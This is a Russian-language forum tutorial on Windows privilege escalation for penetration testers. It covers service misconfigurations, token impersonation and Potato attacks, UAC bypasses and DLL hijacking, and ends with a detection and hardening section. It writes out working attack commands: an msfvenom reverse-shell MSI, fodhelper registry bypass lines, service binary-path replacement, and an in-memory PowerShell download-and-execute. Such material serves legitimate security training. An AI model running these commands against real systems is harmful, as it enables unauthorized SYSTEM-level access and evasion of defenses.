ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   Повышение привилегий Windows: эксплуатация мисконфигураций, токенов и обход UAC на практике (https://forum.antichat.xyz/showthread.php?t=592759)

Sergei webware 21.04.2026 14:50

https://forum.antichat.xyz/attachmen...30573b40fd.png

Ты получил reverse shell от непривилегированного пользователя домена.
Код:

whoami
показывает что-то вроде
Код:

CORP\j.smith
, а
Код:

whoami /priv
- стандартный набор привилегий без единого
Код:

Enabled
. Дальше - тишина: ни доступа к SAM, ни возможности читать хэши, ни прав на установку инструментов. Если ты хоть раз проводил внутренний пентест Windows-инфраструктуры - знаешь это чувство.

Повышение привилегий Windows - это путь от этой точки к SYSTEM или Domain Admin. Не через одну волшебную команду, а через последовательную эксплуатацию мисконфигураций, злоупотребление токенами и обход механизмов вроде UAC - причём большинство этих техник работают исключительно встроенными средствами Windows, что подробно разобрано в руководстве по living off the land атакам. В MITRE ATT&CK это целая тактика TA0004 (Privilege Escalation) - 14 техник и 89 подтехник, одна из самых жирных категорий матрицы.

Русскоязычные материалы по теме обычно заканчиваются на разведке:
Код:

systeminfo
,
Код:

whoami /priv
,
Код:

net user
. Это важно, но это только разминка. Дальше я разберу конкретные техники эксплуатации - то, что происходит после разведки, когда ты уже знаешь, что искать, и нужно это превратить в SYSTEM-шелл.
Разведка после получения шелла: что искать и в каком порядке
Прежде чем бросаться запускать WinPEAS, стоит понять логику приоритизации. На реальном engagement время ограничено, и проверять всё подряд - роскошь. Вот порядок, которым я пользуюсь на практике:

Первый приоритет - привилегии текущего токена.
Код:

whoami /priv
покажет назначенные привилегии. Если среди них
Код:

SeImpersonatePrivilege
или
Код:

SeAssignPrimaryTokenPrivilege
в состоянии Enabled - ты уже на полпути к SYSTEM через Potato-атаки. Эти привилегии часто висят у сервисных аккаунтов IIS, MSSQL, у процессов через Task Scheduler.

Второй приоритет - сервисы с кривыми разрешениями.
Код:

sc qc
покажет путь к бинарю и аккаунт запуска. Но ключевое - проверка DACL самого сервиса через
Код:

sc sdshow
или PowerUp-функцию
Код:

Get-ModifiableService
. Если у твоего пользователя есть право
Код:

SERVICE_CHANGE_CONFIG
- можно подменить путь к бинарю на свой payload.

Третий приоритет - UAC bypass. Актуален, когда ты уже в группе локальных администраторов, но сидишь в medium integrity level. UAC не даёт выполнить привилегированные действия без подтверждения, но существуют десятки способов обойти это ограничение без GUI-взаимодействия.

Четвёртый приоритет - ядерные эксплойты. Проверяй через
Код:

systeminfo
версию ОС и установленные патчи (
Код:

wmic qfe
). Kernel exploits - последнее средство: они нестабильны и могут уронить хост. А объяснять заказчику, почему его продакшн-сервер ушёл в BSOD - удовольствие ниже среднего.
Эксплуатация мисконфигураций служб Windows
Мисконфигурации Windows - хлеб и масло локального повышения привилегий. В отличие от kernel exploits, они не зависят от версии ОС и не вызывают BSOD. По MITRE ATT&CK это подпадает под Hijack Execution Flow (T1574).
Unquoted Service Path
Классика, которую находят на каждом втором внутреннем пентесте. Если путь к бинарю сервиса содержит пробелы и не заключён в кавычки, Windows будет разрешать путь поэтапно. Путь
Код:

C:\Program Files\Custom App\service.exe
без кавычек заставит систему последовательно искать:
  1. Код:

    C:\Program.exe
  2. Код:

    C:\Program Files\Custom.exe
  3. Код:

    C:\Program Files\Custom App\service.exe
Если у тебя есть право записи в
Код:

C:\Program Files\
- создаёшь файл
Код:

Custom.exe
с payload, и при перезапуске сервиса он выполнится от имени аккаунта сервиса (часто LocalSystem). Нюанс: payload должен быть PE-бинарём, корректно обрабатывающим Service Control Manager handshake, иначе SCM прибьёт процесс примерно через 30 секунд.

Поиск уязвимых сервисов через cmd:
Код:

wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v "\""
(примечание:
Код:

wmic
deprecated начиная с Windows 11 22H2+ / Server 2022 и может отсутствовать). PowerShell-альтернатива:
Код:

Get-WmiObject win32_service | Where-Object {$.PathName -notlike '"' -and $.PathName -like ' ' -and $_.PathName -notlike 'C:\Windows\'} | Select Name, PathName, StartMode
. Через PowerUp -
Код:

Get-UnquotedService
. После обнаружения обязательно проверь право записи в промежуточную директорию:
Код:

icacls "C:\Program Files\Custom App"
- ищи флаги
Код:

(W)
или
Код:

(M)
для своей группы.
Слабые DACL на сервисах
Более опасная и менее известная мисконфигурация - когда непривилегированный пользователь может модифицировать конфигурацию сервиса. Проверяется через
Код:

accesschk.exe
из Sysinternals или через PowerUp (
Код:

Get-ModifiableService
). Если результат показывает
Код:

SERVICE_ALL_ACCESS
или
Код:

SERVICE_CHANGE_CONFIG
для группы
Код:

Users
или
Код:

Authenticated Users
- это прямой путь к SYSTEM.

Эксплуатация простая:
Код:

sc config  binPath= "C:\temp\payload.exe"
подменяет путь к бинарю, затем
Код:

sc stop
и
Код:

sc start
. Payload выполнится от имени аккаунта сервиса. После эксплуатации верни оригинальный путь - иначе сервис сломается и тебя заметят быстрее, чем хотелось бы.
Writable Service Binaries
Третий вариант: сам бинарь сервиса доступен на запись. Проверка -
Код:

icacls "C:\path\to\service.exe"
. Если у группы
Код:

Users
есть
Код:

(M)
или
Код:

(F)
- просто замени файл на payload. Встречается реже, но на legacy-системах с кастомным ПО - регулярно. Такое я последний раз видел на заводском сервере с самописной ERP из 2012 года.
AlwaysInstallElevated
Отдельная мисконфигурация, не связанная с сервисами. Если в реестре установлены оба ключа
Код:

HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
и
Код:

HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
в значение
Код:

1
, любой MSI-пакет установится с привилегиями SYSTEM. Проверка:
Код:

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
и аналогично для HKCU. Для эксплуатации генеришь MSI-payload через
Код:

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o shell.msi
и запускаешь
Код:

msiexec /qn /i shell.msi
(флаги
Код:

/quiet
и
Код:

/qn
дублируют друг друга - хватит
Код:

/qn
).
Повышение привилегий через токены Windows: от SeImpersonatePrivilege до SYSTEM
Access Token Manipulation (T1134) и Token Impersonation/Theft (T1134.001) по MITRE ATT&CK - одни из самых результативных техник повышения привилегий Windows. Суть: каждый процесс в Windows работает в определённом security context, который задаётся токеном доступа. Если можешь украсть или имперсонировать токен привилегированного процесса - получаешь его привилегии.
Как работают токены Windows
При входе пользователя в систему Local Security Authority (LSA) создаёт access token: SID пользователя, SID всех его групп, список привилегий и integrity level. Токен наследуется каждым процессом, запущенным пользователем. Два типа токенов: primary (назначается процессу) и impersonation (позволяет потоку временно работать в другом security context).

Ключевая привилегия для атак на токены -
Код:

SeImpersonatePrivilege
. Она позволяет процессу имперсонировать токен другого пользователя после получения хэндла на этот токен. По умолчанию назначена аккаунтам
Код:

LOCAL SERVICE
,
Код:

NETWORK SERVICE
и сервисным аккаунтам - пулам приложений IIS, сервисным аккаунтам SQL Server.
Potato-атаки: эволюция и практика
Potato-семейство - набор техник, эксплуатирующих
Код:

SeImpersonatePrivilege
для получения SYSTEM-токена. Общий принцип: заставить привилегированный процесс (обычно SYSTEM) аутентифицироваться на контролируемом атакующим endpoint, перехватить его токен и имперсонировать.

JuicyPotato работал через злоупотребление COM-серверами (T1559.001) и BITS-сервисом. Указываешь CLSID COM-объекта, который стартует от SYSTEM, и перенаправляешь аутентификацию на свой локальный listener. Ограничение: не работает на Windows Server 2019+ / Windows 10 1809+. Microsoft изменил поведение RPCSS - OXID resolution теперь всегда идёт на 127.0.0.1:135, и атакующий не может перенаправить его на произвольный локальный порт.

RoguePotato обошёл это через socat/redirector на внешнем хосте атакующего: он принимает запрос OXID resolution с порта 135 и возвращает подконтрольный response с указанием произвольного endpoint.

GodPotato - актуальная реализация для Windows Server 2019/2022 и Windows 10/11. Использует RPC/DCOM через CoGetInstanceFromIStorage и NTLM-релей на локальный named pipe: специально сконструированный RPC-запрос принуждает SYSTEM-процесс к NTLM-аутентификации на named pipe атакующего, после чего вызывается
Код:

ImpersonateNamedPipeClient
для получения SYSTEM-токена. Запуск:
Код:

GodPotato.exe -cmd "cmd /c whoami"
- если в ответ
Код:

nt authority\system
, ты дома.

https://forum.antichat.xyz/attachmen...6711159986.png

Перед запуском любого Potato-инструмента убедись, что
Код:

SeImpersonatePrivilege
действительно есть в токене через
Код:

whoami /priv
. Даже если привилегия в состоянии Disabled - Potato-инструменты включат её автоматически через
Код:

AdjustTokenPrivileges
. А вот если
Код:

whoami /priv
не показывает
Код:

SeImpersonatePrivilege
вообще - привилегии нет в токене, и Potato-атаки не сработают. Тут без вариантов.
Прямая кража токенов
Если у тебя уже есть административные права на хосте, но нужен SYSTEM - можно утянуть токен напрямую у процесса, работающего от SYSTEM.
Код:

lsass.exe
,
Код:

winlogon.exe
или
Код:

services.exe
всегда крутятся в SYSTEM-контексте. Через Meterpreter:
Код:

ps
(найти PID SYSTEM-процесса) и
Код:

steal_token
. В Cobalt Strike -
Код:

steal_token
. Без фреймворка - через Win32 API:
Код:

OpenProcess

Код:

OpenProcessToken

Код:

DuplicateTokenEx

Код:

CreateProcessWithTokenW
.
UAC bypass: методы обхода контроля учётных записей
Bypass User Account Control (T1548.002) - одна из самых задокументированных подтехник в MITRE ATT&CK. На странице T1548.002 перечислены десятки APT-групп и семейств малвари: от APT29 и LockBit до Cobalt Strike и Sliver. Это не теоретическая угроза - это стандартный шаг в kill chain.
Почему UAC - не security boundary
Microsoft официально позиционирует UAC не как security boundary, а как «удобство» (convenience feature). Обходы UAC формально не считаются уязвимостями и часто не получают CVE. Именно поэтому многие bypass-методы живут годами без исправлений. Что делает её скорее формальной, чем реальной защитой.

UAC оперирует integrity levels: Low, Medium, High, System. Пользователь из группы администраторов по умолчанию работает на Medium integrity. Для привилегированных операций нужно повысить integrity до High - тут UAC показывает диалог подтверждения. Bypass-техники позволяют перейти от Medium к High без этого диалога.
Fodhelper bypass
По данным MITRE ATT&CK, fodhelper-метод используется группами Earth Lusca, малварью KOCTOPUS (LazyScripter, G0140), Raspberry Robin и Saint Bot (Saint Bear, G1031). Один из самых надёжных UAC bypass на Windows 10/11.

Механизм:
Код:

fodhelper.exe
-
бинарь Microsoft с автоматическим повышением привилегий (Features On Demand Helper). При запуске он читает ключ реестра
Код:

HKCU\Software\Classes\ms-settings\shell\open\command
. HKCU доступен на запись без привилегий - атакующий записывает туда путь к своему payload.
Код:

fodhelper.exe
автоматически повышается до High integrity и выполняет команду из реестра уже в elevated-контексте.

Код:


Код:

reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "C:\temp\payload.exe" /f
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ /d "" /f
fodhelper.exe

После эксплуатации обязательно подчисти за собой:
Код:

reg delete HKCU\Software\Classes\ms-settings\shell\open\command /f
.
Eventvwr bypass
Аналогичный принцип, но через
Код:

eventvwr.exe
(Event Viewer). При запуске он проверяет ключ
Код:

HKCU\Software\Classes\mscfile\shell\open\command
. Если ключ существует - выполняет указанную команду в elevated-контексте. По данным MITRE ATT&CK, метод используется Koadic, BitPaymer и Pupy. BitPaymer, кстати, выбирал технику в зависимости от ОС: на Windows 10 - fodhelper (
Код:

ms-settings
), на Windows 7 - eventvwr (
Код:

mscfile
). Адаптивная малварь - уважаю (как исследователь, разумеется).
CMSTPLUA COM-объект
Более продвинутый метод, замеченный у Avaddon, BADHATCH, LockBit 3.0 и группы Medusa (T1548.002). Вместо манипуляции реестром используется COM-объект
Код:

CMSTPLUA
с интерфейсом
Код:

ICMLuaUtil
и методом
Код:

ShellExec
, выполняющим команды с elevated-привилегиями. Реализация сложнее (нужна работа с COM API), зато менее заметна для детекшн-правил, которые мониторят изменения реестра.
Что не работает на свежих билдах
На Windows 11 23H2+ и Windows Server 2025 часть bypass-методов уже мертва. DLL hijacking в
Код:

wusa.exe
(который использовал H1N1) закрыли ещё в 2020.
Код:

sdclt.exe
bypass (Koadic, WarzoneRAT) - прикрыли изменением логики автоэлевации. Перед использованием конкретного метода проверяй актуальность - репозиторий UACME на GitHub содержит обширный список bypass-методов с указанием версий Windows, на которых они работают.
DLL Hijacking в контексте повышения привилегий
Hijack Execution Flow: DLL (T1574.001) - техника, которая одновременно закрывает задачи persistence, privilege escalation и defense evasion. Принцип: Windows при загрузке DLL следует определённому порядку поиска (DLL Search Order). Если привилегированный процесс ищет DLL, не находит её в ожидаемом месте, а у атакующего есть право записи в одну из директорий поиска - можно подложить свою DLL.

На практике я чаще всего встречаю этот вектор в связке с кастомным ПО. Разработчики ставят приложение в
Код:

C:\CustomApp\
, сервис запускается от SYSTEM и грузит DLL из той же директории. Если ACL на
Код:

C:\CustomApp\
позволяет запись группе
Код:

Users
- прямой путь к SYSTEM через подмену DLL. Разработчики, конечно, не виноваты, они просто не думали, что кто-то полезет в эту папку. Но мы-то полезем.

Обнаружение: Process Monitor (procmon) от Sysinternals с фильтром
Код:

Result = NAME NOT FOUND
и
Код:

Path ends with .dll
покажет все попытки загрузки несуществующих DLL. Запусти procmon, настрой фильтры, перезапусти целевой сервис - в логе появятся пути, по которым можно подложить вредоносную DLL.

https://forum.antichat.xyz/attachmen...6711272681.png

Автоматизация: WinPEAS, PowerUp и Seatbelt
На реальном engagement ручная проверка каждого вектора занимает часы. Автоматизированные инструменты ускоряют разведку, но важно понимать, что именно они проверяют - и что пропускают.

WinPEAS - самый полный инструмент для автоматизированного аудита мисконфигураций. Запуск:
Код:

winPEASx64.exe
. Выводит привилегии токена, уязвимые сервисы, unquoted paths, AlwaysInstallElevated, сохранённые учётные данные, автозапуск и десятки других векторов. Проблема: генерирует огромный вывод, и без понимания контекста критичное легко утонет в шуме. Рекомендую перенаправлять вывод в файл (
Код:

winPEASx64.exe > output.txt
) и искать по цветовой маркировке - красный означает «смотри сюда».

PowerUp (модуль PowerSploit) - работает из PowerShell, что удобно, когда нет возможности загрузить бинарь. Ключевая функция -
Код:

Invoke-AllChecks
: unquoted service paths, модифицируемые сервисы, writable service binaries, AlwaysInstallElevated, автозапуск с writable-путями. Загрузка в память без записи на диск:
Код:

IEX (New-Object Net.WebClient).DownloadString('http:///PowerUp.ps1')
и далее
Код:

Invoke-AllChecks
.

Seatbelt от SpecterOps - ориентирован на сбор данных о security posture хоста. Менее агрессивен, чем WinPEAS, реже триггерит антивирус. Запуск:
Код:

Seatbelt.exe -group=all
. Особенно хорош для обнаружения сохранённых учётных данных, истории браузеров, конфигурации Windows Defender.

BeRoot - лёгкая альтернатива, проверяющая основные векторы: unquoted paths, writable services, AlwaysInstallElevated, scheduled tasks с writable-путями. Менее детальный вывод, зато быстрее работает на слабых машинах.

Требования к окружению: Windows 7+ / Server 2008 R2+, доступ к cmd.exe или powershell.exe, возможность загрузить бинарь на хост (или скрипт PowerShell в память). На hardened-окружениях с AppLocker или WDAC запуск бинарей из пользовательских директорий может быть заблокирован - тогда используй PowerShell-варианты или обходи AppLocker через
Код:

msbuild.exe
/
Код:

installutil.exe
.
Порядок действий: от шелла до SYSTEM
Собираем всё в практический workflow. Предположим, ты получил reverse shell от
Код:

CORP\j.smith
на Windows Server 2019:

📚 Часть контента скрыта. Этот материал доступен участникам сообщества с рангом One Level или выше


Получить доступ просто — достаточно проявить активность на форуме
Детектирование и защита от Windows privilege escalation техник
Понимание атаки невозможно без понимания защиты. Вот что реально работает на стороне blue team:

Мониторинг реестра для UAC bypass: через Sysmon Event ID 12/13/14 мониторь создание и модификацию подключей
Код:

HKCU\Software\Classes\\shell\open\command
, где
Код:


-
Код:

ms-settings
,
Код:

mscfile
,
Код:

Folder
,
Код:

exefile
и другие hijackable ProgIDs (полный список - в репозитории hfiref0x/UACME). Без Sysmon нативный Windows audit эти события в HKCU не логирует. Любая запись в эти ключи вне контекста легитимного администрирования - инцидент.

https://forum.antichat.xyz/attachmen...6711289647.png

Аудит привилегий сервисных аккаунтов: регулярно проверяй, кому назначен
Код:

SeImpersonatePrivilege
. Если веб-приложение работает от
Код:

LOCAL SERVICE
- ему эта привилегия не нужна. Ограничивай назначение привилегий через Group Policy.

DACL-аудит на сервисах: через
Код:

sc sdshow
проверяй, что только администраторы имеют
Код:

SERVICE_CHANGE_CONFIG
. Автоматизируй проверку PowerShell-скриптом по расписанию.

Ограничение автоэлевации UAC: установи UAC на максимальный уровень ("Always Notify",
Код:

ConsentPromptBehaviorAdmin=2
) через GPO. Это заставит UAC показывать prompt даже для автоэлевирующихся процессов Microsoft - ломает silent bypass через fodhelper/eventvwr. Но пользователь всё ещё может кликнуть Yes, так что это лишь частичная защита. Надёжнее: мониторинг процессов-потомков fodhelper.exe / eventvwr.exe / computerdefaults.exe с подозрительной командной строкой через Sysmon Event ID 1.

AppLocker / WDAC: блокировка запуска неподписанных бинарей из пользовательских директорий (
Код:

%TEMP%
,
Код:

%APPDATA%
,
Код:

Downloads
) закроет большинство векторов с загрузкой инструментов. Настрой правила для блокировки
Код:

msiexec.exe
с произвольными MSI-пакетами - это закроет AlwaysInstallElevated.
Вопрос к читателям
На engagement-ах последнего года GodPotato стабильно отрабатывает на Windows Server 2022 с
Код:

SeImpersonatePrivilege
от IIS AppPool-аккаунта. Но я встречал кейсы, где на Server 2022 с январскими кумулятивными обновлениями 2025 года GodPotato молча падает без ошибки, а
Код:

SweetPotato
при этом срабатывает. У кого на стенде Server 2022 Build 20348.2340+? Какой из Potato-инструментов (GodPotato, SweetPotato, EfsPotato) стабильно даёт SYSTEM-шелл на этом билде, и указываете ли вы конкретный CLSID через
Код:

-clsid
при запуске?


Время: 09:44